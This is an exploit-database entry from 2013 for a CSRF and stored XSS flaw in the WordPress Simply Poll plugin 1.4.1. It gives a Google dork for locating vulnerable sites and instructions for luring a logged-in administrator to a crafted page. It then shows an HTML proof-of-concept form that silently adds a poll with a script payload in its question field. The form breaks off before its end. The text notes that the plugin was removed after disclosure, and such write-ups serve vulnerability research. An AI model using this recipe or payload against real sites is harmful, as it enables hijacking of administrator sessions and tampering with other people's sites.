[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WordPress Simply Poll Plugin 1.4.1 - Multiple Vulnerabilities
# Published : 2013-03-18
# Author :
# Previous Title : MTP Image Gallery 1.0 (edit_photos.php, title param) - XSS Vulnerability
# Next Title : CosCms 1.721 - OS Command Injection

# Exploit Title: WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS
# Google Dork: inurl:"/wp-content/plugins/simply-poll
# Date: 16.03.2013
# Exploit Author: m3tamantra
# Vendor Homepage: http://wordpress.org/extend/plugins/simply-poll/
# Software Link: http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip
# Version: 1.4.1
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)

Note: After a email to plugins@wordpress.org, "Simply Poll Plugin" was deleted.

- The question parameter is vulnerable to XSS
- Simply Poll has an CSRF vulnerability (Polls=>Add New) 

The PoC leads to arbitrary javascript execution in back-end area.

Steps to exploit the Flaw:
- Save PoC code in html file
- Send a link (pointing to the PoC html file) to a logged in admin
- When Admin view the Page he will automatically add a new Poll which exploits an XSS vulnerability in the question parameter
- When the admin views the Polls the javascript Code will execute

Note: this was just an example, it is also possible to remove, reset and edit all Polls.

<title>Simply Poll CSRF and XSS</title>
<!-- replace "" -->
<form action="" method="post">
<input type="hidden" name="question" value='Is CSRF+XSS possible?<script>alert(1)</script>' />
<input type="hidden" name="answers[1][answer]" value="yes" />
<input type="hidden" name="answers[2][answer]" value="no" />
<input type="hidden" name="answers[3][answer]" value="maybe" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[5][answer]" value="" />
<input type="hidden" name="answers[4][answer]" value="" />
<input type="hidden" name="answers[6][answer]" value="" />
<input type="hidden" name="answers[7][answer]" value="" />
<input type="hidden" name="answers[8][answer]" value="" />
<input type="hidden" name="answers[9][answer]" value="" />
<input type="hidden" name="answers[10][answer]" value="" />
<input type="hidden" name="polledit" value="new" />